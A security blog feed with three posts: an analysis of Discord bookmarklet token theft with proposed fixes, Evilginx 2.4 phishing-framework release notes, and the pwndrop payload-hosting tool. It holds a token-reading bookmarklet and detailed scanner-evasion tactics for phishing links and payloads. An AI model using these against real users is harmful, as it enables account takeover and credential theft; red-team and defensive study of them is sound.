In this post I will explain how the attacks work, what everyone can do to protect themselves and, more importantly, what Discord can do to mitigate such attacks.

Please bear in mind that this post covers my personal point of view on how I feel the mitigations should be implemented and I am well aware that some of you may have much better ideas. I encourage you to contact me @mrgretzky or at [email protected] if you feel I missed anything or was mistaken.

Criticism is welcomed!

The Master Key

When you log in to your Discord account, either by entering your account credentials on the login screen or by scanning a QR code with your Discord mobile app, Discord will send you your account token, in the form of a string of data.

This token is the only key required to access your Discord account.

From now on I will refer to that token as the master token, since it works like a master key for your Discord account. That single line of text, consisting of around 70 characters, is what the attackers are after. When they manage to extract the master token from your account, it is game over: third parties can freely access your account, bypassing both the login screen and any multi-factor authentication you may've set up.

Now that we know what the attackers are after, let's analyze the attack flow.

Deception Tactics

The attacker's main goal is to convince you, in any way possible, to reveal your account token, with the most likely approach being social engineering. First, attackers will create a story to set themselves up as people you can trust, who will resolve your pressing issue, like unbanning your account on a Discord channel or elevating your community status.

There is a hack/scam(bypasses 2fa) that scammers are using to compromise discord accounts. If you are a project founder/admin, this is IMPORTANT.

Our server just got attacked.

Here's how, a๐Ÿงต

โ€” Little Lemon Friends (@LittlelemonsNFT) January 3, 2022

In this thread you can read how attackers managed to convince the target to do a screen share from their computer with Chrome DevTools opened on the side. DevTools allowed them to extract the master token by revealing the contents of Discord's LocalStorage.

Discord now purposefully renames the window.localStorage object when it loads, to make it inaccessible to injected JavaScript. It also hides the token variable, containing the master token's value, from the storage. This was done to prevent attackers from stealing master tokens by convincing targets to open LocalStorage through screen share.

Discord also shows a pretty warning, informing users about the risks of pasting unknown code into the DevTools console.

Hacked Discord - Bookmarklet Strikes Back

The renaming of the localStorage object and the concealment of the token variable did not fix the issue. Attackers figured out they can force the Discord window to reload and then retrieve the data before the implemented mitigations are executed.

This is exactly how the most recent bookmarklet attack works. Attackers convince their victim to save JavaScript code in their bookmarks tab and later trick them into clicking the saved bookmark, with the Discord app in focus, to execute the attacker's malicious code.

The attacker's code retrieves the victim's Discord master token and sends it to the attacker.

Hacked Discord - Bookmarklet Strikes Back
A saved malicious bookmarklet would look like this.

The malicious JavaScript to access the master token looks like this:

javascript:(function(){location.reload();var i = document.createElement('iframe');document.body.appendChild(i);alert(i.contentWindow.localStorage.token)})()

To try it out, open the Discord website, go to the Console tab in Chrome DevTools (Control+Shift+I) and paste this code into it, which is something you should never do when asked ๐Ÿ˜‰. After you press Enter, you should see a popup box with your master token value in it.

Attackers will exfiltrate the token through Discord WebHooks. This is done to bypass the current Content Security Policy rules, since the discord.com domain is obviously an allowed connection target for the Discord client.

Most users have no idea that saved bookmarks can run malicious JavaScript in the context of the website they are currently viewing. This is why this type of attack may be successful even among security-savvy users.

Another, much harder, approach the attackers can take is deploying malware onto the target's computer. Once you install malware on your PC, the consequences can be far greater than just losing your Discord account. I just wanted to note here that the browser's LocalStorage stores the tokens in unencrypted form.

LocalStorage database files for Chrome reside in:

%LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Local Storage\leveldb\
Hacked Discord - Bookmarklet Strikes Back
Discord master token found inside one of the LocalStorage database files

Once the attacker retrieves your Discord master token, they can inject it into their own browser's LocalStorage, with token as the variable name. It can easily be done using the LocalStorage Manager extension for Chrome.

On reload, Discord will detect the valid token in its LocalStorage and allow full control over the hijacked account. All this is possible even with multi-factor authentication enabled on the hijacked account.

Proposed Mitigations

The fact that a single token, accessible through JavaScript, lets you impersonate and fully control another user's account is what makes the bookmarklet attack possible.

The attacker needs to execute their malicious JavaScript in the context of the user's Discord session. This can happen either through exploitation of an XSS vulnerability or by tricking a user into bookmarking and clicking the JavaScript bookmarklet.

There is unfortunately no definitive fix to this problem, but there are definitely ways to increase the costs for attackers and make the attacks much harder to execute.

Store Token as an HttpOnly Cookie

Modern web services rely heavily on communication with REST APIs and Discord is no different. REST APIs, to conform with the standard, must implement a stateless architecture, meaning that each request from the client to the server must contain all of the information necessary to understand and complete the request.

The session token, included with requests to a REST API, is usually embedded within the Authorization HTTP header. We can see that the Discord app does it the same way:

Hacked Discord - Bookmarklet Strikes Back
Master token sent via Authorization HTTP header

For the web application to be able to include the session token within the Authorization header or request body, the token value itself must be accessible through JavaScript. A token accessible through JavaScript will always be vulnerable to XSS bugs or other JavaScript injection attacks (like bookmarklets).

Some people may not agree with me, but I think that critical authorization tokens should be handled through cookie storage, inaccessible to JavaScript. Support for the Authorization header server-side can also be allowed, but it should be optional. For reasons unknown to me, the majority of REST API developers ignore token authorization via cookies altogether.

The server should send the authorization session token value as a cookie with the HttpOnly flag, in the Set-Cookie HTTP header.

Storing the session token with the HttpOnly flag in the browser will make sure that the cookie can never be retrieved from JavaScript code. The session token will be automatically sent with every HTTP request to the domains the cookie was set up for.
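To make this concrete, here is a minimal Go sketch of a login handler issuing the session token as an HttpOnly cookie; the endpoint, cookie name and token value are made up for illustration:

package main

import "net/http"

func loginHandler(w http.ResponseWriter, r *http.Request) {
	// ...credentials would be verified here...
	http.SetCookie(w, &http.Cookie{
		Name:     "session_token",
		Value:    "OPAQUE-TOKEN-VALUE",
		Path:     "/",
		Secure:   true, // only ever sent over HTTPS
		HttpOnly: true, // never readable from JavaScript
		SameSite: http.SameSiteLaxMode,
	})
	w.WriteHeader(http.StatusOK)
}

func main() {
	http.HandleFunc("/api/v9/auth/login", loginHandler)
	http.ListenAndServe(":8080", nil)
}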

A request sending the authentication token as a cookie could look like this:

Hacked Discord - Bookmarklet Strikes Back
How Discord may be sending the session token via cookies, instead of Authorization header

I've noticed that Discord's functionality does not rely solely on interaction with its API; the major part of its functionality is handled through WebSocket connections.

The WebSocket connection is established with gateway.discord.gg endpoint, instead of the main discord.com domain.

Hacked Discord - Bookmarklet Strikes Back
Discord initiating a WebSocket connection

If the session token cookie were delivered in a response to a request made to the discord.com domain, it would not be possible to set a cookie for the discord.gg domain, due to security boundaries.

To counter that, Discord would either need to implement some smart routing, allowing Discord clients to use WebSocket connections through the discord.com domain, or it would have to implement authorization using a one-time token with the discord.gg endpoint: once the user successfully logs in, discord.gg would return a valid session token as a cookie, for its own domain.

Right now Discord permits anyone to establish a WebSocket connection through gateway.discord.gg, and the authorization token is validated during the internal WebSocket message exchange.

This means that the session token is also required during WebSocket communication, increasing its reliance on being accessible through JavaScript. This brings me to another mitigation that can be implemented.

Ephemeral Session Tokens

Making a strict requirement for tokens to be delivered as HttpOnly cookies will never work. There needs to be some way to have authorization tokens accessible to JavaScript without giving the attacker all the keys to the castle once such a token gets compromised.

That's why I'd make authentication reliant on two types of tokens:

  1. Authentication token stored only as a cookie with the HttpOnly flag, which will be used to authenticate with the REST API and to initiate a WebSocket connection.
  2. Session token generated dynamically with a short expiration time (a few hours), accompanied by a refresh token used for creating new session tokens. Session tokens will be used only in internal WebSocket communication. WebSocket connections will be allowed to be established only after presenting a valid authentication token as a cookie. A rough sketch of this flow follows below.
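Here is a minimal Go sketch of the second part, minting a short-lived session token only for callers presenting the HttpOnly authentication cookie; the endpoint, cookie name and lifetime are all hypothetical:

package main

import (
	"crypto/rand"
	"encoding/hex"
	"encoding/json"
	"net/http"
	"time"
)

func mintSessionToken(w http.ResponseWriter, r *http.Request) {
	// The long-lived authentication token never leaves cookie storage;
	// it is validated server-side before a session token is issued.
	if _, err := r.Cookie("auth_token"); err != nil {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	buf := make([]byte, 32)
	rand.Read(buf)
	json.NewEncoder(w).Encode(map[string]interface{}{
		"session_token": hex.EncodeToString(buf), // used only inside WebSocket messages
		"expires_at":    time.Now().Add(2 * time.Hour).Unix(),
	})
}

func main() {
	http.HandleFunc("/api/session", mintSessionToken)
	http.ListenAndServe(":8080", nil)
}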

If you wish to learn more about ephemeral session tokens and refresh tokens, I recommend this post.

But, wait! Attacker controls the session anyway!

Before you yell at me about all of these mitigations being futile, because the attacker, with their injected JavaScript, is already able to fully impersonate and control the hacked user's session, hear me out.

@buherator and I exchanged opinions about possible mitigations and he made a good point:

I don't see how this would make a difference. The app needs to maintain long term sessions, thus the attacker in control of the app can have them too (if she can't achive her goal in millis). Having to request new tokens periodically is an implementation nuance.

โ€” buherator (@buherator) August 27, 2022

In short - the attacker is able to inject their own JavaScript, which will run in the context of the Discord app. Running malicious code in the context of Discord allows the attacker to make any request to the Discord API, with all required security tokens attached. This also includes cookies stored with the HttpOnly flag, since the attacker's requests can have them included automatically with withCredentials set to true:

var req = new XMLHttpRequest();
req.open("GET", "https://discord.com/api/v9/do_something", true);
req.withCredentials = true;
req.send(null);
How an attacker could make HTTP requests to the Discord API with valid authentication cookies attached.

No matter how well the tokens are protected, the Discord client needs access to all of them, which means an attacker executing code in the context of the app will be able to forge valid client requests, potentially changing the user's settings or sending spam messages to subscribed channels.

I've been thinking about it for a few days and reached the conclusion that implementing the mitigations I mentioned would still be worth it. At the moment the attack is extremely easy to pull off, which is what makes it so dangerous. The ability to forge requests impersonating a target user is not as bad as being able to completely recreate the victim's session within a Discord client, remotely.

With the token cookie protected by the HttpOnly flag, the attacker will only be able to use the token to perform actions impersonating the hacked user; they will never be able to exfiltrate the token's value in order to inject it into their own browser.

In my opinion this would still vastly lower the severity of the attack and would force the attackers to mount a technically more complex attack, requiring knowledge of the Discord API to perform their tasks once the user's session is hijacked.

Another thing to note here is that the attacker would remain in charge of the user's hijacked session only until the Discord app is closed or reloaded. They would not be able to spawn their own session to freely impersonate the hacked user at any time they want. Currently, the stolen master token gives the attacker lifetime access to the victim's account. The token is invalidated and recreated only when the user changes their password.

Takeaways

It is important to note that the attackers are only able to exfiltrate the master token value, using XMLHttpRequest and Discord's WebHooks, by sending it to Discord channels they control. Using WebHooks allows them to comply with Discord's Content Security Policy.

If it weren't for WebHooks, attackers would have to figure out another way to exfiltrate the stolen tokens. At the time of writing this article, the connect-src CSP rules for discord.com, which tell the browser which domains the Discord app should be allowed to connect to, are as follows:

connect-src 'self' https://discordapp.com https://discord.com https://connect.facebook.net https://api.greenhouse.io https://api.github.com https://sentry.io https://www.google-analytics.com https://hackerone-api.discord.workers.dev https://*.hcaptcha.com https://hcaptcha.com https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location ws://127.0.0.1:* http://127.0.0.1:*;

There are other allowed services, which could be used to exfiltrate the tokens, like the GitHub API, Sentry or Google Analytics.

I'm not sure if the Discord client needs access to WebHooks through XMLHttpRequest, but if it doesn't, it may be a better choice for Discord to host WebHook handlers on a different domain than discord.com and control access to them with additional CSP rules.

There is also one question, which remains unanswered:

Should web browsers still support bookmarklets?

As asked by @zh4ck in his tweet, which triggered my initial curiosity about the attacks.

Bookmarklets were useful in the days when it was convenient to click them to spawn an HTML popup for quickly sharing the URL on social media. These days I'm not sure if anyone still needs them.

I have no idea if letting bookmarks start with javascript: is needed anymore, but it can easily become one of those legacy features that will keep coming back to haunt us.

Wrap-up

I hope you liked the post and hopefully it managed to teach you something.

I am constantly looking for interesting projects to work on. If you think my skills may be of help to you, do reach out, through the contact page.

Until next time!


Evilginx 2.4 - Gone Phishing

14 September 2020 at 11:37
Evilginx 2.4 - Gone Phishing

Welcome back everyone! I expect everyone is quite hungry for Evilginx updates! I am happy to announce that the tool is still kicking.

It's been a while since I released the last update. This blog tells me that version 2.3 was released on January 18th, 2019. One and a half years is enough to collect some dust.

I'll make sure the wait was worth it.

First of all, I wanted to thank all of you for the invaluable support over these past years. I've learned about many of you using Evilginx on assessments and how it is providing you with results. Such feedback always warms my heart and pushes me to expand the project. It was an amazing experience to learn how you are using the tool and what direction you would like it to expand in. There were some great ideas in your feedback and this update was partially released to address them.

I'd like to give some honorable mentions to people who provided quality contributions and made this update happen:

>> GET EVILGINX HERE <<


Special Thanks!

Julio @juliocesarfort - For constantly proving to me and himself that the tool works (sometimes even too well)!

OJ Reeves @TheColonial - For being a constant source of great Australian positive energy and feedback, and for always being humble and a wholesome and awesome guy! Check out OJ's live hacking streams on Twitch.tv and pray you're not matched against him in Rocket League!

pry @pry0cc - For pouring me many cups of great ideas, which resulted in great solutions! Also check out his great tool axiom!

Jason Lang @curiousjack - For being able to bend Evilginx to his will and in turn giving me ideas on what features are missing and needed.

@an0nud4y - For sending that PR with amazingly well done phishlets, which inspired me to get back to Evilginx development.

Pepe Berba - For his incredible research and development of a custom version of the LastPass harvester! I still need to implement this incredible idea in future updates.

Aidan Holland @thehappydinoa - For spending his free time creating these super helpful demo videos and helping keep things in order on GitHub.

Luke Turvey @TurvSec - For featuring Evilginx and creating high quality tutorial hacking videos on his YouTube channel.

So, again - thank you very much and I hope this tool stays relevant to your work for years to come and may it bring you lots of pwnage! Just remember to let me know on Twitter via DM that you are using it and about any ideas you have on how to expand it further!

Here is the list of upcoming changes:

2.4.0

  • Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place {lure_url_html} or {lure_url_js} in code to manage redirection to the phishing page with any form of user interaction. Command: lures edit <id> template <template>
  • Feature: Create customized hostnames for every phishing lure. Command: lures edit <id> hostname <hostname>.
  • Feature: Support for routing connection via SOCKS5 and HTTP(S) proxies. Command: proxy.
  • Feature: IP blacklist with automated IP address blacklisting and blocking on all or unauthorized requests. Command: blacklist
  • Feature: Custom parameters can now be embedded encrypted in the phishing url. Command: lures get-url <id> param1=value1 param2="value2 with spaces".
  • Feature: Requests to phishing urls can now be rejected if User-Agent of the visitor doesn't match the whitelist regular expression filter for given lure. Command: lures edit <id> ua_filter <regexp>
  • List of custom parameters can now be imported directly from file (text, csv, json). Command: lures get-url <id> import <params_file>.
  • Generated phishing urls can now be exported to file (text, csv, json). Command: lures get-url <id> import <params_file> export <export_file> <text|csv|json>.
  • Fixed: Requesting LetsEncrypt certificates multiple times without restarting. Subsequent requests would result in "No embedded JWK in JWS header" error.
  • Removed setting custom parameters in lures options. Parameters will now only be sent encoded with the phishing url.
  • Added with_params option to sub_filter allowing to enable the sub_filter only when specific parameter was set with the phishing url.
  • Made command help screen easier to read.
  • Improved autofill for lures edit commands and switched positions of <id> and the variable name.
  • Increased the duration of whitelisting authorized connections for whole IP address from 15 seconds to 10 minutes.

I'll explain the most prominent new features coming in this update, starting with the most important feature of them all.

Pre-phish HTML Templates

First of all, let's focus on what happens when an Evilginx phishing link is clicked. Evilginx verifies that the URL path corresponds to a valid existing lure and immediately shows you the proxied login page of the targeted website.

If that link is sent out onto the internet, every web scanner can start analyzing it right away and eventually, if they do their job, they will identify and flag the phishing page.

Pre-phish HTML templates add another step before the redirection to the phishing page takes place. You can create your own HTML page, which will show up before anything else. On this page, you can decide how the visitor will be redirected to the phishing page.

One idea would be to show a "Loading" page with a spinner and have the page wait for 5 seconds before redirecting to the destination phishing page. Another would be to combine it with some social engineering narrative, showing the visitor a modal dialog of a file shared with them, with the redirection happening after the visitor clicks the "Download" button.

Evilginx 2.4 - Gone Phishing
Pre-phish page requiring the visitor to click the download button before being redirected to the phishing page.

Every HTML template supports customizable variables, whose values can be delivered embedded in the phishing link (more info on that below).

There are also two variables which Evilginx will fill out on its own. These are:

{lure_url}: This will be substituted with an unquoted URL of the phishing page. This one is to be used inside your HTML code. Example output: https://your.phish.domain/path/to/phish

{lure_url_js}: This will be substituted with an obfuscated, quoted URL of the phishing page. The obfuscation is randomized with every page load. This one is to be used inside of your Javascript code. Example output:

'h' + 't' + 'tp' + 's:/' + '/' + 'c' + 'hec' + 'k.' + 't' + 'his' + '.ou' + 't' + '.fa' + 'k' + 'e' + '.' + 'co' + 'm' + '/se' + 'cur' + 'it' + 'y/' + 'c' + 'hec' + 'k?' + 'C' + '=g' + '3' + 'Ct' + 'p' + 'sA'

The first variable can be used with <a href=...> HTML tags like so:

<a href="{lure_url}">Click here</a>

While the second one should be used with your Javascript code:

window.location.assign({lure_url_js});
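If you are curious how such randomized splitting could be produced, here is a tiny illustrative Go sketch (not Evilginx's actual generator):

package main

import (
	"fmt"
	"math/rand"
	"strings"
)

// obfuscateJS chops a URL into randomly sized pieces and emits a
// JavaScript '+'-concatenation, so the literal URL never appears in the
// page source and the output differs with every page load.
func obfuscateJS(url string) string {
	var parts []string
	for len(url) > 0 {
		n := 1 + rand.Intn(3)
		if n > len(url) {
			n = len(url)
		}
		parts = append(parts, "'"+url[:n]+"'")
		url = url[n:]
	}
	return strings.Join(parts, " + ")
}

func main() {
	fmt.Println(obfuscateJS("https://your.phish.domain/path/to/phish"))
}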

If you want to use values coming from custom parameters, which will be delivered embedded in the phishing URL, put placeholders in your template with the parameter name surrounded by curly brackets: {parameter_name}

You can check out one of the sample HTML templates I released, here: download_example.html

Evilginx 2.4 - Gone Phishing
HTML source code of example template

Once you create your HTML template, you need to set it for any lure of your choosing. Remember to put your template file in the /templates directory in the root Evilginx directory; you can also keep it somewhere else and run Evilginx specifying the templates directory location with the -t <templates_path> command line argument.

Set up templates for your lures using this command in Evilginx:

lures edit <id> template <template_name>

Custom Parameters in Phishing Links

In previous versions of Evilginx, you could set up custom parameters for every created lure. This didn't work well at all, as you could only provide custom parameters hardcoded for one specific lure; the parameter values were stored in the database, assigned to the lure ID, and were not dynamically delivered.

This changes with this version. Storing custom parameter values in lures has been removed and replaced with attaching custom parameters during phishing link generation. This allows for dynamic customization of parameters depending on who will receive the generated phishing link.

In the example template mentioned above, there are two custom parameter placeholders used. You can specify {from_name} and {filename} to display a message about who shared a file and the name of the file itself, which will be visible on the download button.

To generate a phishing link using these custom parameters, you'd do the following:

lures get-url 0 from_name="Ronald Rump" filename="Annual Salary Report.xlsx"

Remember - quoting values is only required if you want to include spaces in parameter values. You can also escape quotes with \ e.g. variable1=with\"quote.

This will generate a link, which may look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?vLT=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT

As you can see, both custom parameter values were embedded into a single GET parameter. The parameter name is randomly generated and its value consists of a random RC4 encryption key, a checksum and a base64 encoded encrypted value of all embedded custom parameters. This ensures that the generated link is different every time, making it hard to write static detection signatures for. There is also a simple checksum mechanism implemented, which invalidates the delivered custom parameters if the link ever gets corrupted in transit.
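As a rough illustration of such a scheme (Evilginx's actual format, key placement and checksum algorithm may differ), packing parameters into a single opaque GET parameter could look like this in Go:

package main

import (
	"crypto/rand"
	"crypto/rc4"
	"encoding/base64"
	"fmt"
	"hash/crc32"
)

// encodeParams is a hypothetical sketch: encrypt the parameter string with
// a random RC4 key, prepend the key and a CRC32 checksum, base64 the blob.
func encodeParams(params string) (string, error) {
	key := make([]byte, 16)
	if _, err := rand.Read(key); err != nil {
		return "", err
	}
	c, err := rc4.NewCipher(key)
	if err != nil {
		return "", err
	}
	buf := []byte(params)
	c.XORKeyStream(buf, buf)

	// Checksum lets the receiving side detect corruption in transit.
	crc := crc32.ChecksumIEEE(buf)
	sum := []byte{byte(crc >> 24), byte(crc >> 16), byte(crc >> 8), byte(crc)}
	blob := append(append(key, sum...), buf...)
	return base64.RawURLEncoding.EncodeToString(blob), nil
}

func main() {
	out, err := encodeParams(`from_name=Ronald Rump&filename=Annual Salary Report.xlsx`)
	if err != nil {
		panic(err)
	}
	fmt.Println(out)
}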

Don't forget that custom parameters specified during phishing link generation will also apply to variable placeholders in your js_inject injected Javascript scripts in your phishlets.

It is important to note that you can change the name of the GET parameter which holds the encrypted custom parameters. You can also add your own GET parameters to make the URL look how you want. Evilginx is smart enough to go through all GET parameters and find the one it can decrypt and load custom parameters from.

For example if you wanted to modify the URL generated above, it could look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?token=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT&region=en-US&date=20200907&something=totally_irrelevant_get_parameter

Generating phishing links one by one is all fun until you need 200 of them, each requiring a different set of custom parameters. Thankfully, this update has you covered.

You can now import custom parameters from a file in text, CSV or JSON format and also export the generated links to text, CSV or JSON. You can also just print them on the screen if you want.

Evilginx 2.4 - Gone Phishing
Importing custom parameters from file to generate three phishing links

Custom parameters to be imported in text format look the same way you would type them after the lures get-url command in the Evilginx interface:

[email protected] name="Katelyn Wells"
[email protected] name="George Doh" delay=5000
[email protected] name="John Cena"
params.txt

If you wanted to use CSV format:

email,name,delay
[email protected],"Katelyn Wells",
[email protected],"George Doh",5000
[email protected],"John Cena",
params.csv

And lastly JSON:

[
	{
		"email":"[email protected]",
		"name":"Katelyn Wells"
	},
	{
		"email":"[email protected]",
		"name":"George Doh",
		"delay":"5000"
	},
	{
		"email":"[email protected]",
		"name":"John Cena"
	}
]
params.json

For import files, make sure to suffix the filename with the file extension matching the data format you've decided to use: .txt for text, .csv for CSV and .json for JSON.

Generating phishing links by importing custom parameters from file can be done as easily as:

lures get-url <id> import <import_file>

Now if you also want to export the generated phishing links, you can do it with export parameter:

lures get-url <id> import <import_file> export <export_file> <text|csv|json>

The last command parameter selects the output file format.

Custom Hostnames for Phishing Links

Normally, a phishing URL generated from a given lure would use a hostname being a combination of your phishlet hostname and the primary subdomain assigned to the phishlet. During assessments, most of the time the hostname doesn't matter much, but sometimes you may want to give it a more personalized feel.

That's why I wanted to do something about it and make the phishing hostname, for any lure, fully customizable. Since Evilginx is running its own DNS, it can successfully respond to any DNS A request coming its way.

So now, instead of being forced to use a phishing hostname like www.linkedin.phishing.com, you can change it to whatever you want, like this.is.totally.not.phishing.com. Of course this is a bad example, but it shows that you can go totally wild with the hostname customization; you're no longer constrained by pre-defined phishlet hostnames. Just remember that every custom hostname must end with the domain you set in the config.

You can change a lure's hostname with the following command:

lures edit <id> hostname <your_hostname>

After the change, you will notice that links generated with get-url will use the new hostname.

User-Agent Filtering

This is a feature some of you requested. It allows you to filter requests to your phishing link based on the originating User-Agent header. Just set the ua_filter option for any of your lures, as a whitelist regular expression, and only requests with a matching User-Agent header will be authorized.

As an example, if you'd like only requests from iPhone or Android to go through, you'd set a filter like so:

lures edit <id> ua_filter ".*(Android|iPhone).*"

HTTP & SOCKS5 Proxy Support

You can finally route the connection between Evilginx and the targeted website through an external proxy.

This may be useful if you want the connections to a specific website to originate from a specific IP range or geographical region. It may also prove useful if you want to debug your Evilginx connection and inspect packets using the Burp proxy.

You can check all available commands on how to set up your proxy by typing in:

help proxy

Make sure to always restart Evilginx after you enable proxy mode, since it is the only surefire way to reset all already established connections.

IP Blacklist

If you don't want your Evilginx instance to be accessed from unwanted sources on the internet, you may want to add specific IPs or IP ranges to a blacklist. You can always find the current blacklist file in:

~/.evilginx/blacklist.txt

By default automatic blacklist creation is disabled, but you can easily enable it using one of the following options:

blacklist unauth

This will automatically blacklist the IPs of unauthorized requests. This includes all requests that did not point to a valid URL specified by any of the created lures.

blacklist on

This will blacklist the IP of EVERY incoming request, whether it is authorized or not, so use caution. This will effectively block access to any of your phishing links. You can use this option if you want to send out your phishing link and see if any online scanners pick it up.

If you want to add IP ranges manually to your blacklist file, you can do so by editing the blacklist.txt file in any text editor and adding a netmask to the IP:

134.123.0.0/16

You can also freely add comments, prefixing them with a semicolon:

; this is a comment
18.123.45.0/24 ;another comment

New with_params Option for Phishlets

You can now make any of your phishlet's sub_filter entries optional and have them kick in only if a specific custom parameter is delivered with the phishing link.

You may, for example, want to remove or replace some HTML content only if the custom parameter target_name is supplied with the phishing link. This may allow you to add some unique behavior to proxied websites. All sub_filters with that option will be ignored if the specified custom parameter is not found.

You can add it like this:

sub_filters:
- {triggers_on: 'auth.website.com', orig_sub: 'auth', domain: 'website.com', search: '<body\s', replace: '<body style="visibility: hidden;" ', mimes: ['text/html'], with_params: ['target_name']}

This will hide the page's body only if target_name is specified. The added style can later be removed through Javascript injected with js_inject at any point.

Quality of Life Updates

I've also included some minor updates. There are some improvements to the Evilginx UI, making it a bit more visually appealing. I fixed some bugs I found along the way and did some refactoring. All the changes are listed in the CHANGELOG above.

Epilogue

I'm glad Evilginx has become a go-to offensive tool for red teamers to simulate phishing attacks. It shows that it is not just a proof-of-concept toy, but a full-fledged tool which brings reliability and results during pentests.

I hope some of you will start using the new templates feature. I welcome all quality HTML templates contributions to Evilginx repository!

If you have any ideas/feedback regarding Evilginx or you just want to say "Hi" and tell me what you think about it, do not hesitate to send me a DM on Twitter.

Also please don't ask me about phishlets targeting XYZ website as I will not provide you with any or help you create them. Evilginx is a framework and I leave the creation of phishlets to you. There are already plenty of examples available, which you can use to learn how to create your own.

Happy phishing!

>> GET EVILGINX HERE <<


Find me on Twitter: @mrgretzky

Email: [email protected]

Pwndrop - Self-hosting Your Red Team Payloads

16 April 2020 at 10:07
Pwndrop - Self-hosting Your Red Team Payloads

I have to admit, I took my sweet time to write this post and release this tool, but the time has finally come. I am finally ready to publish pwndrop, which has been in development for the last two years: rewritten from scratch once (Angular.js was not the right choice) and stalled for multiple months due to busy times at work.

The timing for the release isn't ideal, but at least I hope using pwndrop can help you get through these tough weeks/months.

Also stay at home, don't eat bats and do not burn any 5G antennas.

If you want to jump straight in and grab the tool, follow this link to Github:

pwndrop - Github

What is pwndrop?

Pwndrop is a self-deployable file hosting service for red teamers, allowing you to easily upload and share payloads over HTTP and WebDAV.

Pwndrop - Self-hosting Your Red Team Payloads

If you've ever wasted a whole evening setting up a web server just to host a few files and get that .htaccess file redirection working, fear no more. Your future evenings are safe from being wasted again!

With pwndrop you can set up your own on-premise file server. The features are specifically tailored for red teamers wanting to host their payloads, but the tool can also be used as a normal file sharing service. All uploaded files are accessible via HTTP, HTTPS and WebDAV.

Before jumping into the features present on release, I wanted to give away some information about the tool's development process.

Under the hood

For a long time I wanted a self-hosted Dropbox, which would allow me to easily upload and share files with custom URL paths. There is of course Python's SimpleHTTPServer, which has a decent fanbase, but I badly wanted something that would have a web UI with a drag & drop interface and be deployable with a single command. The idea was born. I knew I'd make the backend in Go, but I had no experience with any of the modern frontend libraries. It was 2018 back then and I decided it would be a good opportunity to learn something new.

First came the idea of using Angular.js, since it is a very robust and well supported framework. In the end, it turned out to be too bloated for my needs and the amount of things I had to learn just to make a simple UI (I'm looking at you, TypeScript) was staggering. I managed to get a proof-of-concept version working and then scrapped the whole project to start anew, almost a year later.

Pwndrop - Self-hosting Your Red Team Payloads
You can see that I had absolutely no regrets killing off this monstrosity.

Then in 2019, a really smart and creative red teamer, Jared Haight @jaredhaight, released his C2 framework FactionC2 at TROOPERS19. I immediately fell in love with the web UI he made and, after chatting a bit with him, I learned he used Vue.js. Vue seemed lightweight, relatively new and already pretty popular, which made it a perfect choice. Thanks, Jared, for the inspiration!

I bought a Vue.js course on Udemy and in a few weeks I was ready to go. If you want to make a tool with a web interface, do check out Vue, as it may fit your needs as well.

For my own and your convenience, I got rid of all the npm + webpack clutter to slim down the project as much as possible. When I found out that a small project like pwndrop requires 1000MB of preinstalled packages through npm init, the decision to put the project on a diet was made. I wanted to simplify working with the project as much as possible and cut out the unnecessary middleware. Even using webpack requires learning a ton about how to configure it and I definitely didn't want to spend any extra time on that. Now the project doesn't take more than 70MB of precious hard drive space.

All in all, I've detached the frontend entirely from the build process, allowing the UI files to reside in their own folder, making them easily accessible for modifications and updates. The backend, on the other hand, is a single executable file, which installs itself and runs as a daemon in the background.

My main goal was to dumb down the installation process to the greatest extent possible and I'm pretty proud of the outcome. The whole project has ZERO dependencies and can be installed as easily as copying the precompiled files to your server and entering a single command to install and launch the server.

Let's now jump into the most important part - the features!

Features

Here is the list of features, which you can use from the get-go in the release version.

Drag & drop uploading of files

Easily drag & drop your files onto pwndrop admin panel to upload them.

Pwndrop - Self-hosting Your Red Team Payloads

Works on mobile

Since the UI is made with Bootstrap, I made sure it is responsive and looks good on every device.

A fun way to use pwndrop on your phone is to take photos with the phone camera through the admin panel; they will be automatically uploaded to your server.

Share files over HTTP, HTTPS and even WebDAV

The best part of pwndrop is that it is not just an ordinary web server. My main focus was to also support serving files over WebDAV, which is used for pulling 2nd stage payloads through a variety of different methods.

You can even use it with your l33t "UNC Path 0-days" ;)

In the future I plan to also add support for serving files over SMB. This will also allow stealing Net-NTLMv2 hashes from the machines making the requests.
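For reference, serving a directory over WebDAV takes very little code in Go; this standalone sketch uses the golang.org/x/net/webdav package and is not pwndrop's actual implementation (paths and port are arbitrary):

package main

import (
	"net/http"

	"golang.org/x/net/webdav"
)

func main() {
	h := &webdav.Handler{
		Prefix:     "/dav/",
		FileSystem: webdav.Dir("./files"), // directory holding your payloads
		LockSystem: webdav.NewMemLS(),
	}
	http.Handle("/dav/", h)
	// Clients can now mount http://your-server:8080/dav/ as a WebDAV share.
	http.ListenAndServe(":8080", nil)
}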

Click any of the "copy link" buttons to get a shareable link in your clipboard.

Pwndrop - Self-hosting Your Red Team Payloads

Enable and disable your file downloads

You can enable or disable a file's ability to be downloaded with a single click. Disabled files will return a 404 or follow the pre-configured redirection when requested.

Pwndrop - Self-hosting Your Red Team Payloads

Set up facade files to return a different file from the same URL

Each uploaded file can be set up with a facade file, which will be served when facade mode is enabled.

For example, you may want to share a link to a Word document with your custom macro payload, but you don't want your macro to be analyzed by online scanners as soon as you paste the link. To protect your payload, you can upload a clean document as a facade file under your payload file.

When facade mode is enabled, all online scanners requesting the file will receive your clean facade file. This can give you a brief window of evading detection. To have your link return the payload file, you need to manually disable facade mode.

Pwndrop - Self-hosting Your Red Team Payloads

Create custom URL paths without creating directories

You can set whatever URL path you want for your payloads and pwndrop will always return a file when that URL is reached. There is no need to put files into physical directories.

By default, the tool will put every uploaded file under a randomly generated subdirectory. You can easily change it in the uploaded file's settings.

Pwndrop - Self-hosting Your Red Team Payloads

URL redirects to spoof file extension

Let's say you want to have a shared link pointing to /download/Salary Charts 2020.docx, but after the user clicks it, it should download an HTA payload Salary Charts 2020.docx.hta instead.

Normally you'd have to write some custom .htaccess files to use with Apache's mod_rewrite or fight with nginx configuration files.

